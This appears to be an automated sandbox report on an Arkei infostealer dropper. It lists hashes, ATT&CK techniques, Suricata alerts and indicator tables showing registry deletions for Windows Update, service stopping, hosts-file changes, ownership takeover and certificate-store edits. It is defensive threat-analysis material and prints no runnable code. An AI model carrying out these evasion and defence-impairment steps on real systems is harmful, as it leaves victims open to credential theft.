arkei | 641438e98f1ea2def285e5ba391435bf4b96bc95e351cfacf7be1c5729e7e365

Analysis

max time kernel
182s
max time network
182s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
08/07/2022, 13:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Malware_Dropper.exe
Size

20.5MB
MD5

59d02f49a025628102ce6f5614c88f9f
SHA1

72d54917f8532bb434f645f09ede4e8cf9fcabed
SHA256

641438e98f1ea2def285e5ba391435bf4b96bc95e351cfacf7be1c5729e7e365
SHA512

48dcda93fb6eb51d772b1387eb3ae956259b39d5fb9fd37b6a41e13c23a5885cc2fbcde1bca65c0c64c397faf90d0cc222959594718f33638188ec6adc61511a

Score

10^/10

arkei default discovery evasion exploit stealer suricata

Malware Config

Extracted

Family

arkei

Botnet

Default

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4600 created 3152	4600	Malware_Dropper.exe	39

suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata: ET MALWARE Base64 Encoded Stealer Config from Server - APPDATA or USERPROFILE Environment Variable M4
suricata

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	yolo.exe

Executes dropped EXE 3 IoCs

pid	Process
5052	yolo.exe
3736	UnamDownloader.exe
2368	updater.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
3416	takeown.exe
5036	icacls.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	Malware_Dropper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	yolo.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3416	takeown.exe
5036	icacls.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4600 set thread context of 3560	4600	Malware_Dropper.exe	83

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	powershell.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4904	sc.exe
3128	sc.exe
2620	sc.exe
4432	sc.exe
448	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE

Modifies registry class 57 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	UnamDownloader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 50003100000000008f54570f100041646d696e003c0009000400efbe8f54c206e95435012e0000007fe10100000001000000000000000000000000000000997eb000410064006d0069006e00000014000000	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	UnamDownloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	UnamDownloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	UnamDownloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	UnamDownloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "2"	UnamDownloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4e00310000000000e9545701100054656d7000003a0009000400efbe8f54c206e95457012e0000009ee1010000000100000000000000000000000000000002287f00540065006d007000000014000000	UnamDownloader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	UnamDownloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 56003100000000008f54c20612004170704461746100400009000400efbe8f54c206e95435012e0000008ae101000000010000000000000000000000000000008338f4004100700070004400610074006100000016000000	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f42665c8d01334507439b53224de2ed1fe6260001002600efbe110000008e8c52af6350d801045c807b6550d801045c807b6550d80114000000	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1"	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	UnamDownloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 5000310000000000e954360110004c6f63616c003c0009000400efbe8f54c206e95436012e0000009de101000000010000000000000000000000000000003fe5e0004c006f00630061006c00000014000000	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 78003100000000008f54c2061100557365727300640009000400efbe874f7748e95435012e000000c70500000000010000000000000000003a0000000000d26d0e0155007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff	UnamDownloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	UnamDownloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	UnamDownloader.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	UnamDownloader.exe
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	UnamDownloader.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	UnamDownloader.exe

Modifies registry key 1 TTPs 9 IoCs

Modify Registry

T1112

pid	Process
736	reg.exe
2008	reg.exe
4612	reg.exe
5056	reg.exe
5060	reg.exe
3016	reg.exe
1636	reg.exe
3464	reg.exe
3936	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3136	taskmgr.exe
3136	taskmgr.exe
1072	powershell.exe
1072	powershell.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe
3136	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3136	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3136	taskmgr.exe
Token: SeSystemProfilePrivilege	3136	taskmgr.exe
Token: SeCreateGlobalPrivilege	3136	taskmgr.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeShutdownPrivilege	1608	powercfg.exe
Token: SeCreatePagefilePrivilege	1608	powercfg.exe
Token: SeShutdownPrivilege	3376	powercfg.exe
Token: SeCreatePagefilePrivilege	3376	powercfg.exe
Token: SeShutdownPrivilege	4876	powercfg.exe
Token: SeCreatePagefilePrivilege	4876	powercfg.exe
Token: SeShutdownPrivilege	4720	powercfg.exe
Token: SeCreatePagefilePrivilege	4720	powercfg.exe
Token: SeDebugPrivilege	5052	yolo.exe
Token: SeTakeOwnershipPrivilege	3416	takeown.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeIncreaseQuotaPrivilege	2188	powershell.exe
Token: SeSecurityPrivilege	2188	powershell.exe
Token: SeTakeOwnershipPrivilege	2188	powershell.exe
Token: SeLoadDriverPrivilege	2188	powershell.exe
Token: SeSystemProfilePrivilege	2188	powershell.exe
Token: SeSystemtimePrivilege	2188	powershell.exe
Token: SeProfSingleProcessPrivilege	2188	powershell.exe
Token: SeIncBasePriorityPrivilege	2188	powershell.exe
Token: SeCreatePagefilePrivilege	2188	powershell.exe
Token: SeBackupPrivilege	2188	powershell.exe
Token: SeRestorePrivilege	2188	powershell.exe
Token: SeShutdownPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeSystemEnvironmentPrivilege	2188	powershell.exe
Token: SeRemoteShutdownPrivilege	2188	powershell.exe
Token: SeUndockPrivilege	2188	powershell.exe
Token: SeManageVolumePrivilege	2188	powershell.exe
Token: 33	2188	powershell.exe
Token: 34	2188	powershell.exe
